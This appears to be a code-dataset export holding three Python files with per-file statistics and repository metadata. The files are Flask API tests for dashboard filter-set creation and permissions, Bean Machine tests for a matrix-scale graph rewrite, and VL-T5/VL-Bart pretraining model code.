assert_filterset_was_created(filter_set_data: Dict[str, Any]) -> None: assert get_filter_set_by_name(filter_set_data["name"]) is not None class TestCreateFilterSetsApi: def test_with_extra_field__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create["extra"] = "val" # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert response.json["message"]["extra"][0] == "Unknown field." assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_with_id_field__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create["id"] = 1 # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert response.json["message"]["id"][0] == "Unknown field." assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_with_dashboard_not_exists__404( self, not_exists_dashboard: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # act login(client, "admin") response = call_create_filter_set( client, not_exists_dashboard, valid_filter_set_data_for_create ) # assert assert response.status_code == 404 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_name__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create.pop(NAME_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert get_filter_set_by_dashboard_id(dashboard_id) == [] def test_with_none_name__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[NAME_FIELD] = None # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_with_int_as_name__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[NAME_FIELD] = 4 # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_description__201( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create.pop(DESCRIPTION_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_with_none_description__201( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[DESCRIPTION_FIELD] = None # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_with_int_as_description__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[DESCRIPTION_FIELD] = 1 # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_json_metadata__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create.pop(JSON_METADATA_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_with_invalid_json_metadata__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[DESCRIPTION_FIELD] = {} # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_owner_type__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create.pop(OWNER_TYPE_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_with_invalid_owner_type__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = "OTHER_TYPE" # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_owner_id_when_owner_type_is_user__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create.pop(OWNER_ID_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_without_owner_id_when_owner_type_is_dashboard__201( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE valid_filter_set_data_for_create.pop(OWNER_ID_FIELD, None) # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_with_not_exists_owner__400( self, dashboard_id: int, valid_filter_set_data_for_create: Dict[str, Any], not_exists_user_id: int, client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = not_exists_user_id # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 400 assert_filterset_was_not_created(valid_filter_set_data_for_create) def test_when_caller_is_admin_and_owner_is_admin__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ ADMIN_USERNAME_FOR_TEST ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_admin_and_owner_is_dashboard_owner__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ DASHBOARD_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_admin_and_owner_is_regular_user__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ FILTER_SET_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_admin_and_owner_type_is_dashboard__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, "admin") valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_dashboard_owner_and_owner_is_admin__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, DASHBOARD_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ ADMIN_USERNAME_FOR_TEST ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_dashboard_owner_and_owner_is_dashboard_owner__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, DASHBOARD_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ DASHBOARD_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_dashboard_owner_and_owner_is_regular_user__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, DASHBOARD_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ FILTER_SET_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_dashboard_owner_and_owner_type_is_dashboard__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, DASHBOARD_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_regular_user_and_owner_is_admin__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, FILTER_SET_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ ADMIN_USERNAME_FOR_TEST ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_regular_user_and_owner_is_dashboard_owner__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, FILTER_SET_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ DASHBOARD_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_regular_user_and_owner_is_regular_user__201( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, FILTER_SET_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[ FILTER_SET_OWNER_USERNAME ] # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 201 assert_filterset_was_created(valid_filter_set_data_for_create) def test_when_caller_is_regular_user_and_owner_type_is_dashboard__403( self, dashboard_id: int, test_users: Dict[str, int], valid_filter_set_data_for_create: Dict[str, Any], client: FlaskClient[Any], ): # arrange login(client, FILTER_SET_OWNER_USERNAME) valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id # act response = call_create_filter_set( client, dashboard_id, valid_filter_set_data_for_create ) # assert assert response.status_code == 403 assert_filterset_was_not_created(valid_filter_set_data_for_create)
32.313788
81
0.677832
2,564
20,390
4.855304
0.057332
0.123624
0.13471
0.180737
0.899992
0.889067
0.880231
0.873002
0.8726
0.871877
0
0.011723
0.25949
20,390
630
82
32.365079
0.812769
0.06258
0
0.738636
0
0
0.009309
0
0
0
0
0
0.140909
1
0.068182
false
0
0.015909
0
0.086364
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
1df85b9a41275cb70dc59fecbfd8bddf6b4483b9
6,875
py
Python
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
horizon-blue/beanmachine-1
b13e4e3e28ffb860947eb8046863b0cabb581222
[ "MIT" ]
177
2021-12-12T14:19:05.000Z
2022-03-24T05:48:10.000Z
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
horizon-blue/beanmachine-1
b13e4e3e28ffb860947eb8046863b0cabb581222
[ "MIT" ]
171
2021-12-11T06:12:05.000Z
2022-03-31T20:26:29.000Z
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
horizon-blue/beanmachine-1
b13e4e3e28ffb860947eb8046863b0cabb581222
[ "MIT" ]
31
2021-12-11T06:27:19.000Z
2022-03-25T13:31:56.000Z
# Copyright (c) Meta Platforms, Inc. and affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. import unittest import beanmachine.ppl as bm import torch from beanmachine.ppl.inference import BMGInference from torch.distributions import Normal @bm.random_variable def scalar(): return Normal(0.0, 1.0) matrix = torch.tensor([20, 40]) @bm.functional def scaled(): return scalar() * matrix @bm.functional def scaled_sym(): return matrix * scalar() @bm.functional def scaled2(): return scalar() * torch.tensor([scalar(), scalar()]) @bm.functional def scaled2_sym(): return (torch.tensor([scalar(), scalar()])) * scalar() class FixMatrixScaleTest(unittest.TestCase): def test_fix_matrix_scale_1(self) -> None: self.maxDiff = None observations = {} queries = [scaled()] num_samples = 1000 num_chains = 1 # Sanity check to make sure the model is valid nmc = bm.SingleSiteNewtonianMonteCarlo() _ = nmc.infer( queries=queries, observations=observations, num_samples=num_samples, num_chains=num_chains, ) observed = BMGInference().to_dot(queries, observations, after_transform=False) # The model before optimization expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label="[20,40]"]; N5[label="*"]; N6[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N5; N4 -> N5; N5 -> N6; } """ self.assertEqual(expected.strip(), observed.strip()) # After optimization: observed = BMGInference().to_dot(queries, observations, after_transform=True) expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label="[20,40]"]; N5[label=MatrixScale]; N6[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N5; N4 -> N5; N5 -> N6; }""" self.assertEqual(expected.strip(), observed.strip()) # The model runs on Bean Machine Graph _ = BMGInference().infer(queries, observations, num_samples=num_samples) def test_fix_matrix_scale_1_sym(self) -> None: self.maxDiff = None observations = {} queries = [scaled_sym()] num_samples = 1000 num_chains = 1 # Sanity check to make sure the model is valid nmc = bm.SingleSiteNewtonianMonteCarlo() _ = nmc.infer( queries=queries, observations=observations, num_samples=num_samples, num_chains=num_chains, ) observed = BMGInference().to_dot(queries, observations, after_transform=False) # The model before optimization expected = """ digraph "graph" { N0[label="[20,40]"]; N1[label=0.0]; N2[label=1.0]; N3[label=Normal]; N4[label=Sample]; N5[label="*"]; N6[label=Query]; N0 -> N5; N1 -> N3; N2 -> N3; N3 -> N4; N4 -> N5; N5 -> N6; } """ self.assertEqual(expected.strip(), observed.strip()) # After optimization: observed = BMGInference().to_dot(queries, observations, after_transform=True) expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label="[20,40]"]; N5[label=MatrixScale]; N6[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N5; N4 -> N5; N5 -> N6; }""" self.assertEqual(expected.strip(), observed.strip()) # The model runs on Bean Machine Graph _ = BMGInference().infer(queries, observations, num_samples=num_samples) def test_fix_matrix_scale_2(self) -> None: self.maxDiff = None observations = {} queries = [scaled2()] num_samples = 1000 num_chains = 1 # Sanity check to make sure the model is valid nmc = bm.SingleSiteNewtonianMonteCarlo() _ = nmc.infer( queries=queries, observations=observations, num_samples=num_samples, num_chains=num_chains, ) observed = BMGInference().to_dot(queries, observations, after_transform=False) # The model before optimization expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label=Tensor]; N5[label="*"]; N6[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N4; N3 -> N4; N3 -> N5; N4 -> N5; N5 -> N6; } """ self.assertEqual(expected.strip(), observed.strip()) # After optimization: observed = BMGInference().to_dot(queries, observations, after_transform=True) expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label=2]; N5[label=1]; N6[label=ToMatrix]; N7[label=MatrixScale]; N8[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N6; N3 -> N6; N3 -> N7; N4 -> N6; N5 -> N6; N6 -> N7; N7 -> N8; } """ self.assertEqual(expected.strip(), observed.strip()) # The model runs on Bean Machine Graph _ = BMGInference().infer(queries, observations, num_samples=num_samples) def test_fix_matrix_scale_2_sym(self) -> None: self.maxDiff = None observations = {} queries = [scaled2_sym()] num_samples = 1000 num_chains = 1 # Sanity check to make sure the model is valid nmc = bm.SingleSiteNewtonianMonteCarlo() _ = nmc.infer( queries=queries, observations=observations, num_samples=num_samples, num_chains=num_chains, ) observed = BMGInference().to_dot(queries, observations, after_transform=False) # The model before optimization expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label=Tensor]; N5[label="*"]; N6[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N4; N3 -> N4; N3 -> N5; N4 -> N5; N5 -> N6; } """ self.assertEqual(expected.strip(), observed.strip()) # After optimization: observed = BMGInference().to_dot(queries, observations, after_transform=True) expected = """ digraph "graph" { N0[label=0.0]; N1[label=1.0]; N2[label=Normal]; N3[label=Sample]; N4[label=2]; N5[label=1]; N6[label=ToMatrix]; N7[label=MatrixScale]; N8[label=Query]; N0 -> N2; N1 -> N2; N2 -> N3; N3 -> N6; N3 -> N6; N3 -> N7; N4 -> N6; N5 -> N6; N6 -> N7; N7 -> N8; } """ self.assertEqual(expected.strip(), observed.strip()) # The model runs on Bean Machine Graph _ = BMGInference().infer(queries, observations, num_samples=num_samples)
21.894904
86
0.592291
837
6,875
4.770609
0.127838
0.050088
0.039068
0.050088
0.857501
0.843476
0.832457
0.832457
0.782369
0.782369
0
0.052996
0.264436
6,875
313
87
21.964856
0.736603
0.101527
0
0.82377
0
0
0.330409
0.014295
0
0
0
0
0.032787
1
0.036885
false
0
0.020492
0.020492
0.081967
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
0e16148992c9c3e50c6fd39e90122b58a5e52d3e
11,985
py
Python
VL-T5/src/pretrain_model.py
ylsung/VL_adapter
287409f383f89a11764fc45806864693a4d3e498
[ "MIT" ]
41
2021-12-14T02:50:16.000Z
2022-03-30T07:41:19.000Z
VL-T5/src/pretrain_model.py
ylsung/VL_adapter
287409f383f89a11764fc45806864693a4d3e498
[ "MIT" ]
1
2022-01-07T03:31:47.000Z
2022-03-25T00:31:53.000Z
VL-T5/src/pretrain_model.py
ylsung/VL_adapter
287409f383f89a11764fc45806864693a4d3e498
[ "MIT" ]
2
2021-12-14T03:10:18.000Z
2022-03-29T04:59:23.000Z
import torch import torch.nn as nn import torch.nn.functional as F import numpy as np from modeling_t5 import VLT5 class VLT5Pretraining(VLT5): def __init__(self, config): super().__init__(config) self.losses = self.config.losses.split(',') def train_step(self, batch): device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) lm_labels = batch["target_ids"].to(device) loss_weights = batch["loss_weights"].to(device) output = self( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), labels=lm_labels, return_dict=True ) assert 'loss' in output lm_mask = lm_labels != -100 lm_mask = lm_mask.float() B, L = lm_labels.size() loss = output['loss'] loss = loss.view(B, L) * lm_mask loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} results = {} results['loss'] = (loss * loss_weights).mean() results['total_loss'] = loss.detach().sum() results['total_loss_count'] = len(loss) task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} for _loss, task in zip(loss.detach(), batch['task']): task_loss[task] += _loss task_counts[task] += 1 for task in self.losses: if task_counts[task] > 0: results[f'{task}_loss'] = task_loss[task] results[f'{task}_loss_count'] = task_counts[task] return results @torch.no_grad() def valid_step(self, batch): self.eval() device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) lm_labels = batch["target_ids"].to(device) loss_weights = batch["loss_weights"].to(device) output = self( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), labels=lm_labels, return_dict=True ) assert 'loss' in output lm_mask = lm_labels != -100 lm_mask = lm_mask.float() B, L = lm_labels.size() loss = output['loss'] loss = loss.view(B, L) * lm_mask loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B results = {} results['loss'] = (loss * loss_weights).mean() results['total_loss'] = loss.detach().sum() results['total_loss_count'] = len(loss) task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} for _loss, task in zip(loss.detach(), batch['task']): task_loss[task] += _loss task_counts[task] += 1 for task in self.losses: if task_counts[task] > 0: # result[f'{task}_loss'] = task_loss[task] / task_counts[task] results[f'{task}_loss'] = task_loss[task] results[f'{task}_loss_count'] = task_counts[task] # else: # result[f'{task}_loss'] = torch.zeros_like(loss) if 'qa' in self.losses: output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) results['qa_pred'] = generated_sents return results @torch.no_grad() def generate_step(self, batch): self.eval() device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) vis_attention_mask = None if 'vis_attention_mask' in batch: vis_attention_mask = batch['vis_attention_mask'].to(device) output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), vis_attention_mask=vis_attention_mask, ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) return generated_sents from modeling_bart import VLBart class VLBartPretraining(VLBart): def __init__(self, config): super().__init__(config) self.losses = self.config.losses.split(',') def train_step(self, batch): device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) lm_labels = batch["target_ids"].to(device) loss_weights = batch["loss_weights"].to(device) output = self( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), labels=lm_labels, return_dict=True ) assert 'loss' in output lm_mask = lm_labels != -100 lm_mask = lm_mask.float() B, L = lm_labels.size() loss = output['loss'] loss = loss.view(B, L) * lm_mask loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} results = {} results['loss'] = (loss * loss_weights).mean() results['total_loss'] = loss.detach().sum() results['total_loss_count'] = len(loss) task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} for _loss, task in zip(loss.detach(), batch['task']): task_loss[task] += _loss task_counts[task] += 1 for task in self.losses: if task_counts[task] > 0: results[f'{task}_loss'] = task_loss[task] results[f'{task}_loss_count'] = task_counts[task] return results @torch.no_grad() def valid_step(self, batch): self.eval() device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) lm_labels = batch["target_ids"].to(device) loss_weights = batch["loss_weights"].to(device) output = self( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), labels=lm_labels, return_dict=True ) assert 'loss' in output lm_mask = lm_labels != -100 lm_mask = lm_mask.float() B, L = lm_labels.size() loss = output['loss'] loss = loss.view(B, L) * lm_mask loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B results = {} results['loss'] = (loss * loss_weights).mean() results['total_loss'] = loss.detach().sum() results['total_loss_count'] = len(loss) task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} for _loss, task in zip(loss.detach(), batch['task']): task_loss[task] += _loss task_counts[task] += 1 for task in self.losses: if task_counts[task] > 0: results[f'{task}_loss'] = task_loss[task] results[f'{task}_loss_count'] = task_counts[task] if 'qa' in self.losses: output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) results['qa_pred'] = generated_sents return results @torch.no_grad() def generate_step(self, batch): self.eval() device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) vis_attention_mask = None if 'vis_attention_mask' in batch: vis_attention_mask = batch['vis_attention_mask'].to(device) output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), vis_attention_mask=vis_attention_mask, ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) return generated_sents class DSVLBartPretraining(VLBart): def __init__(self, config): super().__init__(config) self.losses = self.config.losses.split(',') def forward(self, *args, **kwargs): device = next(self.parameters()).device batch = kwargs.get("batch") train_mode = kwargs.get("train_mode") batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) lm_labels = batch["target_ids"].to(device) loss_weights = batch["loss_weights"].to(device) output = super().forward( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), labels=lm_labels, return_dict=True ) assert 'loss' in output lm_mask = lm_labels != -100 lm_mask = lm_mask.float() B, L = lm_labels.size() loss = output['loss'] loss = loss.view(B, L) * lm_mask loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} results = {} results['loss'] = (loss * loss_weights).mean() results['total_loss'] = loss.detach().sum() results['total_loss_count'] = len(loss) task_counts = {task: 0 for task in self.losses} task_loss = {task: 0 for task in self.losses} for _loss, task in zip(loss.detach(), batch['task']): task_loss[task] += _loss task_counts[task] += 1 for task in self.losses: if task_counts[task] > 0: results[f'{task}_loss'] = task_loss[task] results[f'{task}_loss_count'] = task_counts[task] if not train_mode: if 'qa' in self.losses: output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) results['qa_pred'] = generated_sents return results @torch.no_grad() def generate_step(self, batch): self.eval() device = next(self.parameters()).device batch = self.vis_forward(batch, device) vis_feats = batch['vis_feats'].to(device) input_ids = batch['input_ids'].to(device) vis_pos = batch['boxes'].to(device) vis_attention_mask = None if 'vis_attention_mask' in batch: vis_attention_mask = batch['vis_attention_mask'].to(device) output = self.generate( input_ids=input_ids, vis_inputs=(vis_feats, vis_pos), vis_attention_mask=vis_attention_mask, ) generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True) return generated_sents
29.739454
95
0.575136
1,514
11,985
4.309115
0.06605
0.04905
0.055181
0.041845
0.949418
0.948804
0.940221
0.940221
0.940221
0.940221
0
0.007186
0.303296
11,985
403
96
29.739454
0.774132
0.01068
0
0.911032
0
0
0.067263
0
0
0
0
0
0.017794
1
0.039146
false
0
0.021352
0
0.099644
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
385abe74ff6b310074d8a38dbe1b7a6acbc293e8
212
py
Python
pinpayments/exceptions.py
branchup/django-pinpayments
e342970c6309facf35b804de9994d326abaa094f
[ "Unlicense" ]
null
null
null
pinpayments/exceptions.py
branchup/django-pinpayments
e342970c6309facf35b804de9994d326abaa094f
[ "Unlicense" ]
null
null
null
pinpayments/exceptions.py
branchup/django-pinpayments
e342970c6309facf35b804de9994d326abaa094f
